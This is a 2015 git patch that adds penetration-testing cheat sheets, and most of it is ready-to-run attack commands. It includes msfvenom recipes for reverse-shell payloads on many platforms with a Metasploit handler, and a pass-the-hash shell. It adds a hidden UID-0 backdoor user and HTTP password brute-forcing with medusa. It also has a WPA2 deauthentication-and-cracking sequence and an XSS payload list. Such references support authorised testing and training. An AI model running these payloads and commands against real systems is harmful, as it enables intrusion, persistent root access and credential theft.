From 9bc195d4cc05728c4ee29312124ac57ed54bb160 Mon Sep 17 00:00:00 2001
From: Jamie Shaw
Date: Sat, 31 Oct 2015 11:03:26 +0000
Subject: [PATCH] Cheatsheet Updates

Cheatsheet Updates
---
 Cheatsheet_AIXBuild.txt | 37 ++++++++++++++++
 Cheatsheet_MetasploitPayloads.txt | 71 +++++++++++++++++++++++++++++++
 Cheatsheet_PenTesting.txt | 12 +++++-
 Cheatsheet_WirelessTesting.txt | 16 ++++++-
 Cheatsheet_XSS.txt | 9 ++++
 5 files changed, 142 insertions(+), 3 deletions(-)
 create mode 100644 Cheatsheet_AIXBuild.txt
 create mode 100644 Cheatsheet_MetasploitPayloads.txt
 create mode 100644 Cheatsheet_XSS.txt

diff --git a/Cheatsheet_AIXBuild.txt b/Cheatsheet_AIXBuild.txt
new file mode 100644
index 0000000..c28162f
--- /dev/null
+++ b/Cheatsheet_AIXBuild.txt
@@ -0,0 +1,37 @@
+loslevel:
+--------
+
+Reports back on installed service pack, maintenance etc. levels of the AIX deployment.
+Most of these appear to return absolutely nothing or loads of information.
+
+oslevel (reports back the overall AIX version e.g. 6.1.0.0)
+oslevel -q (reports back known maintenance levels on the host)
+oslevel -rq (reports back known Recommended Maintenance Levels, think major releases)
+oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack)
+
+e.g.
+oslevel -s -g 6100-08-03-1339
+
+lslpp:
+------
+
+Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself
+
+e.g.
+lslpp -l (lists all packages, most recent level and state of them)
+The package names can be passed back to it for more info, showing their patch management/application cycle.
+
+e.g.
+lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte
+
+rpm:
+----
+
+Standard redhat package manager, has turned up on a few machines.
+
+rpm -qa
+rpm -qa --last
+These will report back packages installed by rpm and when.
+
+Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag:
+e.g. find /home/ -perm 777
diff --git a/Cheatsheet_MetasploitPayloads.txt b/Cheatsheet_MetasploitPayloads.txt
new file mode 100644
index 0000000..804f7ca
--- /dev/null
+++ b/Cheatsheet_MetasploitPayloads.txt
@@ -0,0 +1,71 @@
+[+] Creating Metasploit Payloads
+
+List payloads
+msfvenom -l
+
+Binaries
+
+Linux
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
+
+Windows
+msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
+
+Mac
+msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
+
+
+Web Payloads
+
+PHP
+msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
+cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
+
+ASP
+msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
+
+JSP
+msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
+
+WAR
+msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
+
+
+Scripting Payloads
+
+Python
+msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
+
+Bash
+msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
+
+Perl
+msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
+
+
+Shellcode
+
+For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
+
+Linux Based Shellcode
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
+
+Windows Based Shellcode
+msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
+
+Mac Based Shellcode
+msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
+
+
+Handlers
+
+Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
+
+use exploit/multi/handler
+set PAYLOAD
+set LHOST
+set LPORT
+set ExitOnSession false
+exploit -j -z
+
+Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
diff --git a/Cheatsheet_PenTesting.txt b/Cheatsheet_PenTesting.txt
index 213524d..32e139d 100644
--- a/Cheatsheet_PenTesting.txt +++ b/Cheatsheet_PenTesting.txt @@ -241,6 +241,10 @@ ssh root@192.168.0.10 -------------------------------------------------------------------------- Post Exploitation +[+] Command prompt access on Windows Host + +pth-winexe -U Administrator% // cmd.exe + [+] Add Linux User /usr/sbin/useradd –g 0 –u 0 –o user echo user:password | /usr/sbin/chpasswd @@ -400,4 +404,10 @@ ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=, Useful Links: http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ -http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ \ No newline at end of file +http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ + + +-------------------------------------------------------------------------- Password Attacks + +[+] Bruteforcing http password prompts +medusa -h -u -P -M http -n -m DIR:/ -T 30 diff --git a/Cheatsheet_WirelessTesting.txt b/Cheatsheet_WirelessTesting.txt index 755d3e7..0ad9717 100644 --- a/Cheatsheet_WirelessTesting.txt +++ b/Cheatsheet_WirelessTesting.txt @@ -1,4 +1,16 @@ -WPA PSK attack with aircrack-ng suite. +WPA2 PSK attack with aircrack-ng suite. +--------------------------------------- + +ifconfig wlan1 # check wireless IFace +sudo airmon-ng check kill # kill issue causing processes +sudo airmon-ng start wlan1 # start monitor mode +sudo airodump-ng wlan1mon # start capturing +sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output +sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client +sudo aircrack-ng output-01.cap dict # crack the passphrase + + +WPA PSK attack with aircrack-ng suite. -------------------------------------- Place your wireless card into Monitor Mode 
@@ -106,4 +118,4 @@ Advanced Encryption Standard (AES) - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: -WPA-Enterprise \ No newline at end of file +WPA-Enterprise diff --git a/Cheatsheet_XSS.txt b/Cheatsheet_XSS.txt new file mode 100644 index 0000000..5386f89 --- /dev/null +++ b/Cheatsheet_XSS.txt @@ -0,0 +1,9 @@ +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +>">'> + + + + +xxs link +xxs link